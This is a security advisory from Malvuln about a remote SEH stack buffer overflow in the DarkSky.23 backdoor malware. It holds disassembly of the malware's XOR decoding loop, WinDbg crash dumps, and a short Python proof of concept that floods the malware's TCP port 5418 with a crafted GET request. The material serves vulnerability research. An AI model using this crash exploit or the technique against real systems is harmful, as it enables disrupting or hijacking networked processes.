Backdoor.Win32.DarkSky.23 malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/1164ef21ef2af97e0339359c0dce5e7d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.DarkSky.23  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 5418. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting EDX register and Structured Exception Handler (SEH). In order to see the typical exploit pattern of "\x41" "AAAA" we need to actually send "\x50" as there is an loop that performs an XOR converting our payload. Therefore, if we send "AAAAAAAA" we will get "PPPPPPPP", the malware performs the XOR with the value of 11.  
Family: DarkSky  
Type: PE32  
MD5: 1164ef21ef2af97e0339359c0dce5e7d  
Vuln ID: MVID-2022-0648  
Dropped files: SysArchive.exe, KNREL32.exe, notepade.exe  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 10/15/2022

Example:

0040134A | 80 34 31 11              | xor byte ptr ds:[ecx+esi],11            | ;XOR converting the payload happens here.  
0040134E | 41                       | inc ecx                                 |  
0040134F | 3B C8                    | cmp ecx,eax                             |  
00401351 | 7C F7                    | jl sysarchive.40134A                    |  
00401353 | 5E                       | pop esi                                 |  
00401354 | C3                       | ret                                     |

Python test...

>>> 0x41 ^ 0x11  
80  
>>> hex(80)  
'0x50'  
>>> chr(0x50)  
'P'

GET /AAAAA will then become all "P" ...

0019D24C  56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41  VTE1>PPPPPAAAAAA    
0019D25C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D26C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D27C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D28C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA  

So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.

>>> 0x50 ^ 0x11  
65  
>>> hex(65)  
'0x41'  
>>> chr(65)  
'A'

EAX : 7EFEFEFE  
EBX : 02902A58  
ECX : 0019F4B0  
EDX : 41414141  
EBP : 0019D230  
ESP : 0019D214  
ESI : 0019D777  
EDI : 0019FF81  
EIP : 7451561B     msvcrt.7451561B

Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" 

0019D240  08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31  .ß...ß......VTE1    
0019D250  3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  >AAAAAAAAAAAAAAA    
0019D260  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D270  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D280  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50  AAAAAAAAAAAAAAAP    
0019D290  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP    
0019D2A0  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP

Memory Dump:  
(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002  
eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400          ret     14h

0:000> .ecxr  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
*** WARNING: Unable to verify checksum for SysArchive.exe  
*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

EXCEPTION_RECORD:  0019cd64 -- (.exr 0x19cd64)  
ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  SysArchive.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt  
    74515590 - msvcrt!strcat  
  [ 8b:cc ]  
    74515617 - msvcrt!strcat+87 (+0x87)  
  [ eb:cc ]  
2 errors : !msvcrt (74515590-74515617)

CONTEXT:  0019cdb4 -- (.cxr 0x19cdb4)  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
Resetting default scope

WRITE_ADDRESS:  001a0000 

FOLLOWUP_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

FAULTING_THREAD:  0000242c

BUGCHECK_STR:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 00404ed7 to 74515619

STACK_TEXT:    
0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89  
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7  
0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394  
0019f9ec 41414141 41414141 41414141 41414141 0x41414141  
0019f9f0 41414141 41414141 41414141 41414141 0x41414141  
0019f9f4 41414141 41414141 41414141 41414141 0x41414141  
0019f9f8 41414141 41414141 41414141 41414141 0x41414141  
0019f9fc 41414141 41414141 41414141 41414141 0x41414141  
0019fa00 41414141 41414141 41414141 41414141 0x41414141  
0019fa04 41414141 41414141 41414141 41414141 0x41414141  
0019fa08 41414141 41414141 41414141 41414141 0x41414141  
0019fa0c 41414141 41414141 41414141 41414141 0x41414141  
0019fa10 41414141 41414141 41414141 41414141 0x41414141  
0019fa14 41414141 41414141 41414141 41414141 0x41414141  
0019fa18 41414141 41414141 41414141 41414141 0x41414141  
0019fa1c 41414141 41414141 41414141 41414141 0x41414141  
0019fa20 41414141 41414141 41414141 41414141 0x41414141  
0019fa24 41414141 41414141 41414141 41414141 0x41414141  
0019fa28 41414141 41414141 41414141 41414141 0x41414141  
0019fa2c 41414141 41414141 41414141 41414141 0x41414141  
0019fa30 41414141 41414141 41414141 41414141 0x41414141  
...

SYMBOL_NAME:  memory_corruption!msvcrt

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: memory_corruption

IMAGE_NAME:  memory_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb

FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt

BUCKET_ID:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt

0:000> !exchain  
0019cc18: ntdll!_except_handler4+0 (77716a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (777557ad)  
0019f9dc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=5418

def doit():  
    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000  
    PAYLOAD=JUNK+"\r\n\r\n"

    s.send(PAYLOAD)  
    s.close()  
    print("Backdoor DarkSky.23 Exploit By malvuln")

if __name__=="__main__":  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#redis